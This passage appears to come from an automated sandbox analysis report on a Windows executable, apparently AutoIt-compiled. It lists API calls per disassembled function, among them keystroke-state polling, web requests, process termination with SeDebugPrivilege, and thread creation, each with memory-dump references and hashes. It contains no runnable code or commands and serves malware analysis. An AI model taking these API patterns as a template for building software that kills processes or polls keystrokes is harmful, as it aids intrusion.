                                                                                                      • Part of subcall function 00AB912D: GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00B38B6B
                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 00B38B71
                                                                                                    • ReleaseCapture.USER32 ref: 00B38B77
                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00B38C12
                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00B38C25
                                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00B38CFF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                    • API String ID: 1924731296-2107944366
                                                                                                    • Opcode ID: 0eed6fe36b1addea998caca2f1444c887c392d2ae582ad7f815bed71250f212d
                                                                                                    • Instruction ID: d425e0d210f15a883bf9f6cfabeae05e8c6ad4c83ea16863b527bf02a15b183c
                                                                                                    • Opcode Fuzzy Hash: 0eed6fe36b1addea998caca2f1444c887c392d2ae582ad7f815bed71250f212d
                                                                                                    • Instruction Fuzzy Hash: 42518B71104300AFD704DF18DD56FAE77E4FB88714F500A69F956672E1CB70A945CB62
                                                                                                    APIs
                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B1C29A
                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B1C2CA
                                                                                                    • GetLastError.KERNEL32 ref: 00B1C322
                                                                                                    • SetEvent.KERNEL32(?), ref: 00B1C336
                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00B1C341
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                    • Opcode ID: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                                                                                                    • Instruction ID: 8271e2d11ca4e858e3f9677198af3a5510d3cc52218806498244ae4f6589daf9
                                                                                                    • Opcode Fuzzy Hash: cbf778069a762725faf658f4a544b648c881a889e92dafbed7f2cd3bba2ccd67
                                                                                                    • Instruction Fuzzy Hash: EE317FB1540204AFD7219FA59C88AEF7FFCEB49744B50855DF456E3200DB30DD849B65
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00AE3AAF,?,?,Bad directive syntax error,00B3CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 00B098BC
                                                                                                    • LoadStringW.USER32(00000000,?,00AE3AAF,?), ref: 00B098C3
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B09987
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                    • API String ID: 858772685-4153970271
                                                                                                    • Opcode ID: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                                                                                                    • Instruction ID: 1c968eb40666d058885000ce93ef3a7ea129c8083ef5a64f8b69b58a4f325e8f
                                                                                                    • Opcode Fuzzy Hash: b038935bb5f77bfad3bc5257b4ce12b44b79c92bf7a02db4ed78a028d4005310
                                                                                                    • Instruction Fuzzy Hash: E921603280021AAFCF16AF90CD06EEE7BB9FF19700F044495F515660E2EF759A18DB61
                                                                                                    APIs
                                                                                                    • GetParent.USER32 ref: 00B020AB
                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00B020C0
                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B0214D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClassMessageNameParentSend
                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                    • API String ID: 1290815626-3381328864
                                                                                                    • Opcode ID: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                                                                                                    • Instruction ID: 29d072581c973372328c6f2fc84c4f58d75490a84719efb22cdb2cf338e03dc9
                                                                                                    • Opcode Fuzzy Hash: 1d0c2778dd22c003b004193c32c08d0f5fa787481da9d918537f4b7230a065b1
                                                                                                    • Instruction Fuzzy Hash: CA112976688706B9FA252720DC0FDEA7BDCCF09364F21019AFB04B60E1FE65685A5618
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                    • String ID:
                                                                                                    • API String ID: 1282221369-0
                                                                                                    • Opcode ID: 55c049977c8da644a979f64435ea151abcba12bcc1183f7fbc447e6a38053616
                                                                                                    • Instruction ID: c1044a71d68c50fcbd8b425dfc202f34a0888417eaabe110925f0339e5881e3b
                                                                                                    • Opcode Fuzzy Hash: 55c049977c8da644a979f64435ea151abcba12bcc1183f7fbc447e6a38053616
                                                                                                    • Instruction Fuzzy Hash: 2F6147B1904302AFDB21AFB8D985BAD7BA5EF09320F44416FF947A7381EA319D41D790
                                                                                                    APIs
                                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00AF6890
                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00AF68A9
                                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00AF68B9
                                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00AF68D1
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00AF68F2
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF6901
                                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00AF691E
                                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00AB8874,00000000,00000000,00000000,000000FF,00000000), ref: 00AF692D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1268354404-0
                                                                                                    • Opcode ID: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                                                                                                    • Instruction ID: a9cfc17c914954bad923e38aad6c388bceaf9df52a48cc5f8c0ac9eea5d5df33
                                                                                                    • Opcode Fuzzy Hash: 4a66c713a497472d50b3ffee85125d02b5f7b26bad2e81fef7e714f684aa9a38
                                                                                                    • Instruction Fuzzy Hash: 29518870600209EFDB20CF68CC95FAE7BB9EF58750F204518FA16A72A0DB74E991DB50
                                                                                                    APIs
                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B1C182
                                                                                                    • GetLastError.KERNEL32 ref: 00B1C195
                                                                                                    • SetEvent.KERNEL32(?), ref: 00B1C1A9
                                                                                                      • Part of subcall function 00B1C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B1C272
                                                                                                      • Part of subcall function 00B1C253: GetLastError.KERNEL32 ref: 00B1C322
                                                                                                      • Part of subcall function 00B1C253: SetEvent.KERNEL32(?), ref: 00B1C336
                                                                                                      • Part of subcall function 00B1C253: InternetCloseHandle.WININET(00000000), ref: 00B1C341
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 337547030-0
                                                                                                    • Opcode ID: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                                                                                                    • Instruction ID: 6f1c422700dedc276d741c4945e671b3bb179b2b3703f69317886cc090fb1eb1
                                                                                                    • Opcode Fuzzy Hash: 70c1be7499fd3bc2c03525a0c1b3d0039f8aca70c1d3810cde15a29543dbd104
                                                                                                    • Instruction Fuzzy Hash: 0F317A71280601EFDB219FE5DC48AAABFF9FF18300B50445DF95A93610DB30E9949BA0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
                                                                                                      • Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
                                                                                                      • Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025BD
                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B025DB
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B025DF
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B025E9
                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B02601
                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B02605
                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B0260F
                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B02623
                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B02627
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014098862-0
                                                                                                    • Opcode ID: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                                                                                                    • Instruction ID: ae09bbbb6b563360615e7eb33daebdffbf2da34ae1decd7393d6a5731c4c8311
                                                                                                    • Opcode Fuzzy Hash: 7ece0f3a2372bf6352220c7aa7a772ad4b25404f36e34a3b9fea6dbe0a9fba20
                                                                                                    • Instruction Fuzzy Hash: EA01D431390610BBFB1067A89C8EF5D3F99EB4EB12F200001F318BF0E1CDE224449A69
                                                                                                    APIs
                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00B01449,?,?,00000000), ref: 00B0180C
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01813
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01828
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00B01449,?,?,00000000), ref: 00B01830
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B01833
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B01449,?,?,00000000), ref: 00B01843
                                                                                                    • GetCurrentProcess.KERNEL32(00B01449,00000000,?,00B01449,?,?,00000000), ref: 00B0184B
                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00B01449,?,?,00000000), ref: 00B0184E
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00B01874,00000000,00000000,00000000), ref: 00B01868
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1957940570-0
                                                                                                    • Opcode ID: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                                                                                                    • Instruction ID: 90d638d9c879a5c06dc8c3eae28ca26b1a5ee483e77677ad4cd6c2133ba22c4d
                                                                                                    • Opcode Fuzzy Hash: 48a64d5271aa6f866dd6648d23662723e9177888ae2a7e29ffaec21b9cf84c9e
                                                                                                    • Instruction Fuzzy Hash: 1F01BBB5240708BFE710ABA5DC4DF6B3FACEB89B11F108411FA05EB1A1CA70D810DB20
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B0D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
                                                                                                      • Part of subcall function 00B0D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
                                                                                                      • Part of subcall function 00B0D4DC: CloseHandle.KERNEL32(00000000), ref: 00B0D5DC
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A16D
                                                                                                    • GetLastError.KERNEL32 ref: 00B2A180
                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B2A1B3
                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B2A268
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00B2A273
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B2A2C4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                    • String ID: SeDebugPrivilege
                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                    • Opcode ID: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                                                                                                    • Instruction ID: b64a7699e49730fc8e414259d97ddcee332ee2b2334f93679d8068c5e9db7ba7
                                                                                                    • Opcode Fuzzy Hash: ac54e404d5877f7f1eed021afd2bf6744b76efcfa6cd9f0dd387e6b4e3cd1fcc
                                                                                                    • Instruction Fuzzy Hash: 01618E302042529FD720DF18D494F1ABBE5EF45318F18849CE46A9B7A3C776EC49CB92
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B33925
                                                                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00B3393A
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B33954
                                                                                                    • _wcslen.LIBCMT ref: 00B33999
                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B339C6
                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B339F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window_wcslen
                                                                                                    • String ID: SysListView32
                                                                                                    • API String ID: 2147712094-78025650
                                                                                                    • Opcode ID: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                                                                                                    • Instruction ID: bd2f9f7b345421ccd6f4d283410bfe7642f2413a5586a66d1e6016e3b55fdf54
                                                                                                    • Opcode Fuzzy Hash: 6836185ec7c77413264cba90a2e8f7a896e93542eb412db1979770f7d0b4a295
                                                                                                    • Instruction Fuzzy Hash: C741A471A00218ABEB219F64CC45FEF7BE9EF08754F200566F559E7291D7719D80CB90
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B0BCFD
                                                                                                    • IsMenu.USER32(00000000), ref: 00B0BD1D
                                                                                                    • CreatePopupMenu.USER32 ref: 00B0BD53
                                                                                                    • GetMenuItemCount.USER32(015C5520), ref: 00B0BDA4
                                                                                                    • InsertMenuItemW.USER32(015C5520,?,00000001,00000030), ref: 00B0BDCC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                    • String ID: 0$2
                                                                                                    • API String ID: 93392585-3793063076
                                                                                                    • Opcode ID: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                                                                                                    • Instruction ID: 0225c6be0efb4ea36df9a9bbb03fcab3c49cc55676dad1d34288709793128b96
                                                                                                    • Opcode Fuzzy Hash: 1123c3b771c50165c0605b4afd61c00c34d6726eb868c9cee030da66a4ef763d
                                                                                                    • Instruction Fuzzy Hash: 5F518C70A00206EBDB20DFA8D889FAEFFF4EF55354F2482A9E411A72D1D7709945CB61
                                                                                                    APIs
                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00B0C913
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: IconLoad
                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                    • API String ID: 2457776203-404129466
                                                                                                    • Opcode ID: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                                                                                                    • Instruction ID: 88d5aac780fb02eab6c6202d7953c675cab27e1376fcdb2b154d2040858be893
                                                                                                    • Opcode Fuzzy Hash: c6ededa03912db855b972d332d83fc185372695c763e1f07eae9bfbc5d6cc6f4
                                                                                                    • Instruction Fuzzy Hash: 9E110A32689306BAE7169B549CC3DBE7FDCDF15354B2041AEF904A62D2E7B49E00526C
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$LocalTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 952045576-0
                                                                                                    • Opcode ID: 56ec14bab143e79aadbec94110c8fd5cce686eed047ebd7595d166b5170922d3
